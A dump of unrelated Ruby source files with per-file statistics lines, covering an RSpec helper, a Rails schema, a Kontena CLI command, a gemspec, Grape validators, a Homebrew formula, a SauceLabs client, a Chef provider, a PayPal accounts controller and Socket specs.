$LOAD_PATH.unshift File.expand_path('../../lib', __FILE__)
require 'conjur-policy-parser'
require 'logger'
if ENV['DEBUG']
Conjur::PolicyParser::YAML::Handler.logger.level = Logger::DEBUG
end
require 'sorted_yaml.rb'
RSpec.configure do |c|
c.include SortedYAML
c.order = "random"
c.filter_run_when_matching :focus
end
| 21.76 | 66 | 0.762868 |
62eda3b876b980c6942991ea930150d72f1de1ee | 1,962 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended to check this file into your version control system.
ActiveRecord::Schema.define(:version => 20120307201016) do
create_table "plutus_accounts", :force => true do |t|
t.string "name"
t.string "type"
t.boolean "contra"
t.datetime "created_at", :null => false
t.datetime "updated_at", :null => false
end
add_index "plutus_accounts", ["name", "type"], :name => "index_plutus_accounts_on_name_and_type"
create_table "plutus_transactions", :force => true do |t|
t.string "description"
t.integer "credit_account_id"
t.integer "debit_account_id"
t.decimal "amount", :precision => 20, :scale => 10
t.integer "commercial_document_id"
t.string "commercial_document_type"
t.datetime "created_at", :null => false
t.datetime "updated_at", :null => false
end
add_index "plutus_transactions", ["commercial_document_id", "commercial_document_type"], :name => "plutus_ts_on_commercial_doc"
add_index "plutus_transactions", ["credit_account_id"], :name => "index_plutus_transactions_on_credit_account_id"
add_index "plutus_transactions", ["debit_account_id"], :name => "index_plutus_transactions_on_debit_account_id"
end
| 47.853659 | 129 | 0.703874 |
18abdd674c58e28c258afd5a94bde3af5888c763 | 2,734 | require_relative 'common'
module Kontena::Cli::Apps
class MonitorCommand < Kontena::Command
include Kontena::Cli::Common
include Kontena::Cli::GridOptions
include Common
option ['-f', '--file'], 'FILE', 'Specify an alternate Kontena compose file', attribute_name: :filename, default: 'kontena.yml'
option ['-p', '--project-name'], 'NAME', 'Specify an alternate project name (default: directory name)'
parameter "[SERVICE] ...", "Services to start"
attr_reader :services
def execute
require_config_file(filename)
@services = services_from_yaml(filename, service_list, service_prefix, true)
if services.size > 0
show_monitor(services)
elsif !service_list.empty?
puts "No such service: #{service_list.join(', ')}".colorize(:red)
end
end
def show_monitor(services)
require_api_url
token = require_token
loop do
nodes = {}
services.each do |name, data|
service = prefixed_name(name)
result = client(token).get("services/#{current_grid}/#{service}/containers") rescue nil
if result
services[name]['instances'] = result['containers'].size
result['containers'].each do |container|
container['service'] = name
nodes[container['node']['name']] ||= []
nodes[container['node']['name']] << container
end
end
end
clear_terminal
puts "services:"
services.each do |name, data|
color = color_for_service(name)
puts " #{"■".colorize(color)} #{name} (#{data['instances']} instances)"
end
puts "nodes:"
node_names = nodes.keys.sort
node_names.each do |name|
containers = nodes[name]
puts " #{name} (#{containers.size} instances)"
print " "
containers.each do |container|
icon = "■"
if container['status'] != 'running'
icon = "□"
end
color = color_for_service(container['service'])
print icon.colorize(color)
end
puts ''
end
sleep 1
end
end
def color_for_service(service)
color_maps[service] = colors.shift unless color_maps[service]
color_maps[service].to_sym
end
def color_maps
@color_maps ||= {}
end
def colors
if(@colors.nil? || @colors.size == 0)
@colors = %i(
red green yellow blue magenta cyan bright_red bright_green
bright_yellow bright_blue bright_magenta bright_cyan
)
end
@colors
end
def clear_terminal
print "\e[H\e[2J"
end
end
end
| 29.085106 | 131 | 0.579371 |
39547c3e7f774024c023c6350a9f344ab2b4f960 | 1,509 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'motion_flux/version'
Gem::Specification.new do |spec|
spec.name = 'motion_flux'
spec.version = MotionFlux::VERSION
spec.authors = ['kayhide']
spec.email = ['[email protected]']
spec.summary = 'MotionFlux supports to build Flux-based RubyMotion apps.'
spec.description = 'MotionFlux supports to build Flux-based RubyMotion apps.'
spec.homepage = 'https://github.com/kayhide/motion_flux'
spec.license = 'MIT'
spec.files = `git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
spec.bindir = 'exe'
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ['lib']
spec.add_runtime_dependency 'motion_blender'
spec.add_runtime_dependency 'motion_blender-support'
spec.add_development_dependency 'bundler', '~> 1.10'
spec.add_development_dependency 'rake', '~> 10.0'
spec.add_development_dependency 'rspec'
spec.add_development_dependency 'fuubar'
spec.add_development_dependency 'pry'
spec.add_development_dependency 'pry-doc'
spec.add_development_dependency 'rubocop'
spec.add_development_dependency 'guard'
spec.add_development_dependency 'guard-rspec'
spec.add_development_dependency 'guard-rubocop'
spec.add_development_dependency 'simplecov'
spec.add_development_dependency 'simplecov-gem-profile'
end
| 40.783784 | 104 | 0.720345 |
034a66e5a0180efabeb75931b06d71722aa67168 | 3,183 | # frozen_string_literal: true
module Grape
module Validations
class Base
attr_reader :attrs
# Creates a new Validator from options specified
# by a +requires+ or +optional+ directive during
# parameter definition.
# @param attrs [Array] names of attributes to which the Validator applies
# @param options [Object] implementation-dependent Validator options
# @param required [Boolean] attribute(s) are required or optional
# @param scope [ParamsScope] parent scope for this Validator
# @param opts [Hash] additional validation options
def initialize(attrs, options, required, scope, opts = {})
@attrs = Array(attrs)
@option = options
@required = required
@scope = scope
@fail_fast = opts[:fail_fast] || false
@allow_blank = opts[:allow_blank] || false
end
# Validates a given request.
# @note Override #validate! unless you need to access the entire request.
# @param request [Grape::Request] the request currently being handled
# @raise [Grape::Exceptions::Validation] if validation failed
# @return [void]
def validate(request)
return unless @scope.should_validate?(request.params)
validate!(request.params)
end
# Validates a given parameter hash.
# @note Override #validate if you need to access the entire request.
# @param params [Hash] parameters to validate
# @raise [Grape::Exceptions::Validation] if validation failed
# @return [void]
def validate!(params)
attributes = SingleAttributeIterator.new(self, @scope, params)
# we collect errors inside array because
# there may be more than one error per field
array_errors = []
attributes.each do |val, attr_name, empty_val|
next if [email protected]? && empty_val
next unless @scope.meets_dependency?(val, params)
begin
if @required || val.respond_to?(:key?) && val.key?(attr_name)
validate_param!(attr_name, val)
end
rescue Grape::Exceptions::Validation => e
array_errors << e
end
end
raise Grape::Exceptions::ValidationArrayErrors, array_errors if array_errors.any?
end
def self.convert_to_short_name(klass)
ret = klass.name.gsub(/::/, '/')
ret.gsub!(/([A-Z]+)([A-Z][a-z])/, '\1_\2')
ret.gsub!(/([a-z\d])([A-Z])/, '\1_\2')
ret.tr!('-', '_')
ret.downcase!
File.basename(ret, '_validator')
end
def self.inherited(klass)
return unless klass.name.present?
Validations.register_validator(convert_to_short_name(klass), klass)
end
def message(default_key = nil)
options = instance_variable_get(:@option)
options_key?(:message) ? options[:message] : default_key
end
def options_key?(key, options = nil)
options = instance_variable_get(:@option) if options.nil?
options.respond_to?(:key?) && options.key?(key) && !options[key].nil?
end
def fail_fast?
@fail_fast
end
end
end
end
| 34.978022 | 89 | 0.623311 |
080845976bdaf3216bc35a9c304dc8b848d6b1d2 | 276 | require "scanf.rb"
for i in (1 .. 3) do
(a, b) = STDIN.readline.split(" ").map{ |x| x.to_i(10) }
printf "a = %d b = %d\n", a, b
end
l = STDIN.readline.split(" ").map{ |x| x.to_i(10) }
for j in (0 .. 9) do
printf "%d\n", l[j]
end
| 25.090909 | 60 | 0.449275 |
ab9c3b56ddceccc7587ffffe1d631d1e6caf0213 | 2,833 | class Gitless < Formula
include Language::Python::Virtualenv
desc "Simplified version control system on top of git"
homepage "http://gitless.com/"
url "https://github.com/sdg-mit/gitless/archive/v0.8.5.tar.gz"
sha256 "c93f8f558d05f41777ae36fab7434cfcdb13035ae2220893d5ee222ced1e7b9f"
bottle do
cellar :any
sha256 "dbd90d04f1b8a52f1fb5863c333743a2e605c89c0bfc3ad822a9acc97280ed1c" => :sierra
sha256 "af14e898522880559559a08e3c65d9946fcdba0bfc74f55d22b9aa63c40b8404" => :el_capitan
sha256 "310cffdb2c69ebfd282959870e94880a7d2fc256510066d609788b36b6368973" => :yosemite
end
depends_on :python if MacOS.version <= :snow_leopard
depends_on "libgit2"
resource "args" do
url "https://files.pythonhosted.org/packages/e5/1c/b701b3f4bd8d3667df8342f311b3efaeab86078a840fb826bd204118cc6b/args-0.1.0.tar.gz"
sha256 "a785b8d837625e9b61c39108532d95b85274acd679693b71ebb5156848fcf814"
end
resource "cffi" do
url "https://files.pythonhosted.org/packages/a1/32/e3d6c3a8b5461b903651dd6ce958ed03c093d2e00128e3f33ea69f1d7965/cffi-1.9.1.tar.gz"
sha256 "563e0bd53fda03c151573217b3a49b3abad8813de9dd0632e10090f6190fdaf8"
end
resource "clint" do
url "https://files.pythonhosted.org/packages/3d/b4/41ecb1516f1ba728f39ee7062b9dac1352d39823f513bb6f9e8aeb86e26d/clint-0.5.1.tar.gz"
sha256 "05224c32b1075563d0b16d0015faaf9da43aa214e4a2140e51f08789e7a4c5aa"
end
resource "pycparser" do
url "https://files.pythonhosted.org/packages/be/64/1bb257ffb17d01f4a38d7ce686809a736837ad4371bcc5c42ba7a715c3ac/pycparser-2.17.tar.gz"
sha256 "0aac31e917c24cb3357f5a4d5566f2cc91a19ca41862f6c3c22dc60a629673b6"
end
resource "pygit2" do
url "https://files.pythonhosted.org/packages/29/fb/fd98403ed4ec5554ed4f6de3719d2c672ca2518598061ff7231301ff864b/pygit2-0.24.2.tar.gz"
sha256 "2aae85836c3a8da686220db7db05f91f8797e37edf91cc2a1f88b09fb653166a"
end
resource "sh" do
url "https://files.pythonhosted.org/packages/2e/b8/9920bfdf91a3ffaa23aed32c8438857b2bcec40f2f8babfe0862f7da8fa7/sh-1.12.8.tar.gz"
sha256 "06e51b2f4c6429be7be48ef0e3439bc7f939d57100dd0febb408291af3fe55f3"
end
resource "six" do
url "https://files.pythonhosted.org/packages/b3/b2/238e2590826bfdd113244a40d9d3eb26918bd798fc187e2360a8367068db/six-1.10.0.tar.gz"
sha256 "105f8d68616f8248e24bf0e9372ef04d3cc10104f1980f54d57b2ce73a5ad56a"
end
def install
virtualenv_install_with_resources
end
test do
system bin/"gl", "init"
system "git", "config", "user.name", "Gitless Install"
system "git", "config", "user.email", "Gitless@Install"
%w[haunted house].each { |f| touch testpath/f }
system bin/"gl", "track", "haunted", "house"
system bin/"gl", "commit", "-m", "Initial Commit"
assert_equal "haunted\nhouse", shell_output("git ls-files").strip
end
end
| 41.661765 | 138 | 0.791387 |
035ca71b809852e9a119888f15d5c56ef4f827ba | 5,492 | require "faraday"
require "json"
module Blade::SauceLabsPlugin::Client
extend self
delegate :config, :username, :access_key, :debug?, to: Blade::SauceLabsPlugin
def request(method, path, params = {})
connection.send(method) do |req|
req.url path
req.headers["Content-Type"] = "application/json"
req.body = params.to_json
end
end
def get_jobs(options = {})
JSON.parse(request(:get, "/rest/v1/#{username}/jobs?#{options.to_query}").body)
end
def update_job(id, params = {})
request(:put, "/rest/v1/#{username}/jobs/#{id}", params)
end
def stop_job(id)
request(:put, "/rest/v1/#{username}/jobs/#{id}/stop")
end
def delete_job(id)
request(:delete, "/rest/v1/#{username}/jobs/#{id}")
end
def get_available_vm_count
data = JSON.parse(request(:get, "/rest/v1/users/#{username}/concurrency").body)
data["concurrency"][username]["remaining"]["overall"]
end
def platforms
[].tap do |platforms|
config.browsers.each do |name, config|
browser =
case config
when String, Numeric
{ version: config }
when Hash
config.symbolize_keys
else
{}
end.merge(name: name)
browser[:os] =
if browser[:os].is_a?(String)
browser[:os].split(",").map(&:strip)
else
Array(browser[:os])
end
platforms.concat platforms_for_browser(browser)
end
end
end
def platforms_for_browser(browser)
platforms = available_platforms_for_browser(browser)
versions_by_os = {}
platforms.each do |os, details|
versions_by_os[os] = details[:versions].uniq.sort_by(&:to_f).reverse
end
if browser[:os].any?
browser[:os].flat_map do |browser_os|
versions =
if browser[:version].is_a?(Numeric) && browser[:version] < 0
versions_by_os[browser_os].select { |v| v =~ /^\d/ }.first(browser[:version].abs.to_i)
elsif browser[:version].present?
Array(browser[:version]).map(&:to_s)
else
versions_by_os[browser_os].first(1)
end
versions.map do |version|
os = platforms.keys.detect { |os| os =~ Regexp.new(browser_os, Regexp::IGNORECASE) }
platform = platforms[os][:api][version].first
{ platform: platform[0], browserName: platform[1], version: platform[2] }
end
end
else
all_versions = versions_by_os.values.flatten.uniq
versions =
if browser[:version].is_a?(Numeric) && browser[:version] < 0
all_versions.select { |v| v =~ /^\d/ }.first(browser[:version].abs.to_i)
elsif browser[:version].present?
Array(browser[:version]).map(&:to_s)
else
all_versions.first(1)
end
versions.map do |version|
os = platforms.detect { |os, details| details[:api][version].any? }.first
platform = platforms[os][:api][version].first
{ platform: platform[0], browserName: platform[1], version: platform[2] }
end
end
end
def available_platforms_for_browser(browser)
{}.tap do |platforms|
find_browser_long_names(browser[:name]).each do |long_name|
available_platforms_by_browser[long_name].each do |os, details|
if platforms[os]
platforms[os][:versions] = (platforms[os][:versions] + details[:versions]).compact.uniq
details[:api].each do |key, values|
if platforms[os][:api][key]
platforms[os][:api][key] = (platforms[os][:api][key] + values).compact.uniq
else
platforms[os][:api][key] = values
end
end
else
platforms[os] = details
end
end
end
end
end
def available_platforms_by_browser
@available_platforms_by_browser ||= {}.tap do |by_browser|
available_platforms.group_by { |p| [ p[:device], p[:api_name] ].compact.join(":") }.each do |api_name, platforms|
long_name = platforms.first[:long_name]
by_browser[long_name] = {}
platforms.group_by { |p| p[:os].split(" ").first }.each do |os, platforms|
by_browser[long_name][os] = {}
by_browser[long_name][os][:versions] = []
by_browser[long_name][os][:api] = {}
versions = platforms.map { |p| p[:short_version] }.uniq.sort_by(&:to_f).reverse
versions.each do |version|
by_browser[long_name][os][:versions] << version
by_browser[long_name][os][:api][version] = platforms.map do |platform|
if platform[:short_version] == version
platform.values_at(:os, :api_name, :short_version)
end
end.compact
end
end
end
end
end
private
def connection
@connnection ||= Faraday.new("https://#{username}:#{access_key}@saucelabs.com/") do |faraday|
faraday.adapter Faraday.default_adapter
faraday.request :url_encoded
faraday.response :logger if debug?
end
end
def find_browser_long_names(name)
pattern = Regexp.new(name, Regexp::IGNORECASE)
available_platforms_by_browser.keys.select do |long_name|
long_name =~ pattern
end
end
def available_platforms
@available_platforms ||= JSON.parse(connection.get("/rest/v1/info/platforms/webdriver").body).map(&:symbolize_keys)
end
end
| 30.853933 | 121 | 0.599417 |
e2144132401f97e0a5e9455c21e9aaf1b74c6f9b | 2,902 | # Cookbook Name: pris
# Provider: mapper
#
# Copyright (c) 2015 ConvergeOne Holdings Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
def whyrun_supported?
true
end
use_inline_resources
action :create do
if @current_resource.exists
Chef::Log.info "#{@new_resource} already exists - checking for changes."
if @current_resource.changed
Chef::Log.info "#{@new_resource} has changed - updating."
converge_by("Update #{@new_resource}") do
add_mapper # same as adding
new_resource.updated_by_last_action(true)
end
else
Chef::Log.info "#{@new_resource} has not changed - nothing to do."
end
else
Chef::Log.info "#{@new_resource} does not exist - creating."
converge_by("Create #{@new_resource}") do
add_mapper
new_resource.updated_by_last_action(true)
end
end
end
action :delete do
if @current_resource.exists
Chef::Log.info "#{@new_resource} exists - deleting."
converge_by("Delete #{@new_resource}") do
delete_mapper
new_resource.updated_by_last_action(true)
end
else
Chef::Log.info "#{@new_resource} does not exist - nothing to do."
end
end
action :create_if_missing do
if @current_resource.exists
Chef::Log.info "#{@new_resource} already exists - nothing to do."
else
converge_by("Create #{@new_resource}") do
add_mapper
new_resource.updated_by_last_action(true)
end
end
end
def pris
Opennms::Pris.new(node)
end
def load_current_resource
@current_resource = Chef::Resource::PrisMapper.new(@new_resource.name)
@current_resource.requisition_name(@new_resource.requisition_name)
@current_resource.type(@new_resource.type)
@current_resource.params(@new_resource.params)
if pris.requisition_exists?(@current_resource.requisition_name)
@current_resource.requisition_exists = true
if pris.mapper_exists?(@current_resource.type, @current_resource.requisition_name)
@current_resource.exists = true
if pris.mapper_changed?(@current_resource.requisition_name, @current_resource.type, @current_resource.params)
@current_resource.changed = true
end
end
end
end
private
def add_mapper
pris.add_requisition_mapper(new_resource.requisition_name, new_resource.type, new_resource.params)
end
def delete_mapper
pris.delete_requisition_mapper(new_resource.requisition_name, new_resource.params)
end
| 29.313131 | 115 | 0.740179 |
1845acaa1c5b086a1e99391e6865b2a6d2c096b6 | 1,022 | module Fog
module Parsers
module Compute
module AWS
class DescribeReservedInstances < Fog::Parsers::Base
def reset
@reserved_instance = {}
@response = { 'reservedInstancesSet' => [] }
end
def end_element(name)
case name
when 'availabilityZone', 'instanceType', 'productDescription', 'reservedInstancesId', 'state', 'offeringType'
@reserved_instance[name] = value
when 'duration', 'instanceCount'
@reserved_instance[name] = value.to_i
when 'fixedPrice', 'amount'
@reserved_instance[name] = value.to_f
when 'item'
@response['reservedInstancesSet'] << @reserved_instance
@reserved_instance = {}
when 'requestId'
@response[name] = value
when 'start'
@reserved_instance[name] = Time.parse(value)
end
end
end
end
end
end
end
| 27.621622 | 121 | 0.540117 |
9161e7f7b3d2603259a1758cecfb227e70a47da2 | 147 | module FormtasticAutoSelect2
module Infectors
module Formtastic
extend ActiveSupport::Autoload
autoload :Inputs
end
end
end | 18.375 | 36 | 0.734694 |
6aecfbd34bdeea66757e92de558b7845638d62d6 | 10,237 | class PaypalAccountsController < ApplicationController
include PaypalService::PermissionsInjector
include PaypalService::MerchantInjector
before_filter do |controller|
controller.ensure_logged_in t("layouts.notifications.you_must_log_in_to_view_your_settings")
end
before_filter :ensure_paypal_enabled
PaypalAccountForm = FormUtils.define_form("PaypalAccountForm")
PaypalAccountEntity = PaypalService::PaypalAccount::Entity
PaypalAccountQuery = PaypalService::PaypalAccount::Query
PaypalAccountCommand = PaypalService::PaypalAccount::Command
DataTypePermissions = PaypalService::DataTypes::Permissions
def show
paypal_account = PaypalAccountQuery.personal_account(@current_user.id, @current_community.id)
return redirect_to action: :new unless PaypalAccountEntity.paypal_account_prepared?(paypal_account)
@selected_left_navi_link = "payments"
commission_from_seller = @current_community.commission_from_seller ? @current_community.commission_from_seller : 0
community_ready_for_payments = PaypalHelper.community_ready_for_payments?(@current_community)
flash.now[:error] = t("paypal_accounts.new.admin_account_not_connected") unless community_ready_for_payments
render(locals: {
community_ready_for_payments: community_ready_for_payments,
left_hand_navigation_links: settings_links_for(@current_user, @current_community),
paypal_account: paypal_account,
paypal_account_email: Maybe(paypal_account)[:email].or_else(""),
commission_from_seller: t("paypal_accounts.commission", commission: commission_from_seller)
})
end
def new
paypal_account = PaypalAccountQuery.personal_account(@current_user.id, @current_community.id)
return redirect_to action: :show if PaypalAccountEntity.paypal_account_prepared?(paypal_account)
@selected_left_navi_link = "payments"
commission_from_seller = @current_community.commission_from_seller ? @current_community.commission_from_seller : 0
community_currency = @current_community.default_currency
community_ready_for_payments = PaypalHelper.community_ready_for_payments?(@current_community)
flash.now[:error] = t("paypal_accounts.new.admin_account_not_connected") unless community_ready_for_payments
render(locals: {
community_ready_for_payments: community_ready_for_payments,
left_hand_navigation_links: settings_links_for(@current_user, @current_community),
form_action: person_paypal_account_path(@current_user),
paypal_account_form: PaypalAccountForm.new,
paypal_account_state: Maybe(paypal_account)[:order_permission_state].or_else(""),
paypal_account_email: Maybe(paypal_account)[:email].or_else(""),
commission_from_seller: t("paypal_accounts.commission", commission: commission_from_seller),
minimum_commission: minimum_commission,
currency: community_currency
})
end
def create
return redirect_to action: :new unless PaypalHelper.community_ready_for_payments?(@current_community)
paypal_account = PaypalAccountQuery.personal_account(@current_user.id, @current_community.id)
order_permission_verified = PaypalAccountEntity.order_permission_verified?(paypal_account)
if order_permission_verified
create_billing_agreement
else
create_paypal_account
end
end
def permissions_verified
unless params[:verification_code].present?
return flash_error_and_redirect_to_settings(error_msg: t("paypal_accounts.new.permissions_not_granted"))
end
access_token_res = fetch_access_token(params[:request_token], params[:verification_code])
return flash_error_and_redirect_to_settings(error_response: access_token_res) unless access_token_res[:success]
personal_data_res = fetch_personal_data(access_token_res[:token], access_token_res[:token_secret])
return flash_error_and_redirect_to_settings(error_response: personal_data_res) unless personal_data_res[:success]
PaypalAccountCommand.update_personal_account(
@current_user.id,
@current_community.id,
{
email: personal_data_res[:email],
payer_id: personal_data_res[:payer_id]
}
)
PaypalAccountCommand.confirm_pending_permissions_request(
@current_user.id,
@current_community.id,
params[:request_token],
access_token_res[:scope].join(","),
params[:verification_code]
)
redirect_to new_paypal_account_settings_payment_path(@current_user.username)
end
def billing_agreement_success
affirm_agreement_res = affirm_billing_agreement(params[:token])
return flash_error_and_redirect_to_settings(error_response: affirm_agreement_res) unless affirm_agreement_res[:success]
billing_agreement_id = affirm_agreement_res[:billing_agreement_id]
express_checkout_details_req = PaypalService::DataTypes::Merchant.create_get_express_checkout_details({token: params[:token]})
express_checkout_details_res = paypal_merchant.do_request(express_checkout_details_req)
paypal_account = PaypalAccountQuery.personal_account(@current_user.id, @current_community.id)
if !express_checkout_details_res[:billing_agreement_accepted]
return flash_error_and_redirect_to_settings(error_msg: t("paypal_accounts.new.billing_agreement_not_accepted"))
elsif express_checkout_details_res[:payer_id] != paypal_account[:payer_id]
return flash_error_and_redirect_to_settings(error_msg: t("paypal_accounts.new.billing_agreement_wrong_account"))
end
success = PaypalAccountCommand.confirm_billing_agreement(@current_user.id, @current_community.id, params[:token], billing_agreement_id)
redirect_to show_paypal_account_settings_payment_path(@current_user.username)
end
def billing_agreement_cancel
PaypalAccountCommand.cancel_pending_billing_agreement(@current_user.id, @current_community.id, params[:token])
flash[:error] = t("paypal_accounts.new.billing_agreement_canceled")
redirect_to new_paypal_account_settings_payment_path(@current_user.username)
end
private
def create_paypal_account
PaypalAccountCommand.create_personal_account(
@current_user.id,
@current_community.id
)
permissions_url = request_paypal_permissions_url
if permissions_url.blank?
flash[:error] = t("paypal_accounts.new.could_not_fetch_redirect_url")
return redirect_to action: :new
else
return redirect_to permissions_url
end
end
def create_billing_agreement
billing_agreement_url = request_paypal_billing_agreement_url
if billing_agreement_url.blank?
flash[:error] = t("paypal_accounts.new.could_not_fetch_redirect_url")
return redirect_to action: :new
else
return redirect_to billing_agreement_url
end
end
# Before filter
def ensure_paypal_enabled
unless @current_community.paypal_enabled?
flash[:error] = t("paypal_accounts.new.paypal_not_enabled")
redirect_to person_settings_path(@current_user)
end
end
def request_paypal_permissions_url
permission_request = PaypalService::DataTypes::Permissions
.create_req_perm({callback: permissions_verified_person_paypal_account_url })
response = paypal_permissions.do_request(permission_request)
if response[:success]
PaypalAccountCommand.create_pending_permissions_request(
@current_user.id,
@current_community.id,
response[:username_to],
permission_request[:scope],
response[:request_token]
)
response[:redirect_url]
else
nil
end
end
def request_paypal_billing_agreement_url
commission_from_seller = @current_community.commission_from_seller ? "#{@current_community.commission_from_seller} %" : "0 %"
billing_agreement_request = PaypalService::DataTypes::Merchant
.create_setup_billing_agreement({
description: t("paypal_accounts.new.billing_agreement_description"),
success: billing_agreement_success_person_paypal_account_url,
cancel: billing_agreement_cancel_person_paypal_account_url
})
response = paypal_merchant.do_request(billing_agreement_request)
if response[:success]
PaypalAccountCommand.create_pending_billing_agreement(
@current_user.id,
@current_community.id,
response[:username_to],
response[:token]
)
puts "1234334"
puts "assssssssssss---------------------------"
response[:redirect_url] = "https://pg-platform.herokuapp.com/"
else
nil
end
end
def affirm_billing_agreement(token)
affirm_billing_agreement_req = PaypalService::DataTypes::Merchant
.create_create_billing_agreement({token: token})
paypal_merchant.do_request(affirm_billing_agreement_req)
end
def fetch_access_token(request_token, verification_code)
access_token_req = DataTypePermissions.create_get_access_token(
{
request_token: params[:request_token],
verification_code: params[:verification_code]
}
)
access_token_res = paypal_permissions.do_request(access_token_req)
end
def fetch_personal_data(token, token_secret)
personal_data_req = DataTypePermissions.create_get_basic_personal_data(
{
token: token,
token_secret: token_secret
}
)
paypal_permissions.do_request(personal_data_req)
end
def flash_error_and_redirect_to_settings(error_response: nil, error_msg: nil)
error_msg =
if (error_msg)
error_msg
elsif (error_response && error_response[:error_code] == "570058")
t("paypal_accounts.new.account_not_verified")
else
t("paypal_accounts.new.something_went_wrong")
end
flash[:error] = error_msg
redirect_to new_paypal_account_settings_payment_path(@current_user.username)
end
def minimum_commission
payment_type = MarketplaceService::Community::Query.payment_type(@current_community.id)
currency = @current_community.default_currency
case payment_type
when :paypal
paypal_minimum_commissions_api.get(currency)
else
Money.new(0, currency)
end
end
def paypal_minimum_commissions_api
PaypalService::API::Api.minimum_commissions_api
end
end
| 37.498168 | 139 | 0.77298 |
38feb7b37474804c42e80631426005c7549ec486 | 2,558 | # encoding: utf-8
module Pulo
module Steam
class Boiler
attr_reader :feedwater, :steam, :blowdown
attr_reader :blowdown_rate, :combustion_efficiency
attr_reader :boiler_power, :fuel_power
def initialize(feedwater_pressure: nil,blowdown_rate: nil,combustion_efficiency:nil,steam_pressure: nil,
steam_temperature: nil,fuel_power: nil,
steam_massflow: nil,feedwater_massflow: nil)
raise "Need all parameters" unless
feedwater_pressure && blowdown_rate &&
combustion_efficiency && steam_pressure &&
(steam_temperature || fuel_power) &&
(steam_massflow || feedwater_massflow)
#steam_massflow=steam_massflow
@blowdown_rate=blowdown_rate
@combustion_efficiency=combustion_efficiency
@steam_temperature=steam_temperature
@feedwater_pressure=feedwater_pressure
@steam_pressure=steam_pressure
@fuel_power=fuel_power
#feedwater_massflow=feedwater_massflow
@blowdown=WaterSteam.new(pressure: @steam_pressure, quality: Dimensionless.new(0))
if steam_massflow
feedwater_massflow=steam_massflow/(1-@blowdown_rate)
else
steam_massflow=feedwater_massflow*(1-@blowdown_rate)
end
@blowdown.mass_flow=feedwater_massflow*@blowdown_rate
#@[email protected]_enthalpy*@blowdown_massflow
@feedwater=WaterSteam.new(pressure: @feedwater_pressure, quality: Dimensionless.new(0))
@feedwater.mass_flow=feedwater_massflow
#@[email protected]_enthalpy*@feedwater_massflow
if @steam_temperature
@steam=WaterSteam.new(pressure: @steam_pressure, temperature: @steam_temperature)
@steam.mass_flow=steam_massflow
#@[email protected]_enthalpy*@steam_massflow
@[email protected]_flow + @blowdown.energy_flow - @feedwater.energy_flow
@fuel_power=@boiler_power/@combustion_efficiency
else
@boiler_power=@fuel_power*@combustion_efficiency
steam_power=@[email protected][email protected]_flow
specific_enthalpy=steam_power/steam_massflow
@steam=WaterSteam.new(pressure: @steam_pressure, specific_enthalpy: specific_enthalpy)
@steam.mass_flow=steam_massflow
raise "Boiler not boiling!" if @steam.if97_region=="1"
end
end
end
end
end | 41.934426 | 111 | 0.685301 |
0821aecc8f639f884606614f13125be2f00712ba | 995 | SparkleFormation.dynamic(:files_tower_callback) do | id, config = {} |
set!('/usr/local/bin/tower-callback') do
content join!([
"#!/bin/bash\n",
"retry_attempts=10\n",
"attempt=0\n",
"while [[ $attempt -lt $retry_attempts ]]\n",
"do\n",
" status_code=`curl -s -i --data \"host_config_key=$2\" https://$1/api/v1/job_templates/$3/callback/ | head -n 1 | awk '{print $2}'`\n",
" if [[ $status_code == 202 ]]\n",
" then\n",
" exit 0\n",
" fi\n",
" attempt=$(( attempt + 1 ))\n",
" echo \"${status_code} received... retrying in 1 minute. (Attempt ${attempt})\"\n",
" sleep 60\n",
"done\n",
"exit 1\n",
])
mode "000755"
end
end | 41.458333 | 159 | 0.38392 |
91950d8e2ba7c7afeb17e62d938e469076498e3f | 223 |
class CreateArtists < ActiveRecord::Migration[4.2]
def change
create_table :artists do |t|
t.string :name
t.string :genre
t.integer :age
t.string :hometown
end
end
end | 20.272727 | 50 | 0.58296 |
6a03a8ecd02591ca1164e75429cd5fc6d9dbcba9 | 7,560 | require 'socket'
describe 'Socket.getaddrinfo' do
describe 'without global reverse lookups' do
it 'returns an Array' do
Socket.getaddrinfo(nil, 'http').should be_an_instance_of(Array)
end
it 'accepts a Fixnum as the address family' do
array = Socket.getaddrinfo(nil, 'http', Socket::AF_INET)[0]
array[0].should == 'AF_INET'
array[1].should == 80
array[2].should == '127.0.0.1'
array[3].should == '127.0.0.1'
array[4].should == Socket::AF_INET
array[5].should be_an_instance_of(Fixnum)
array[6].should be_an_instance_of(Fixnum)
end
it 'accepts a Fixnum as the address family using IPv6' do
array = Socket.getaddrinfo(nil, 'http', Socket::AF_INET6)[0]
array[0].should == 'AF_INET6'
array[1].should == 80
array[2].should == '::1'
array[3].should == '::1'
array[4].should == Socket::AF_INET6
array[5].should be_an_instance_of(Fixnum)
array[6].should be_an_instance_of(Fixnum)
end
it 'accepts a Symbol as the address family' do
array = Socket.getaddrinfo(nil, 'http', :INET)[0]
array[0].should == 'AF_INET'
array[1].should == 80
array[2].should == '127.0.0.1'
array[3].should == '127.0.0.1'
array[4].should == Socket::AF_INET
array[5].should be_an_instance_of(Fixnum)
array[6].should be_an_instance_of(Fixnum)
end
it 'accepts a Symbol as the address family using IPv6' do
array = Socket.getaddrinfo(nil, 'http', :INET6)[0]
array[0].should == 'AF_INET6'
array[1].should == 80
array[2].should == '::1'
array[3].should == '::1'
array[4].should == Socket::AF_INET6
array[5].should be_an_instance_of(Fixnum)
array[6].should be_an_instance_of(Fixnum)
end
it 'accepts a String as the address family' do
array = Socket.getaddrinfo(nil, 'http', 'INET')[0]
array[0].should == 'AF_INET'
array[1].should == 80
array[2].should == '127.0.0.1'
array[3].should == '127.0.0.1'
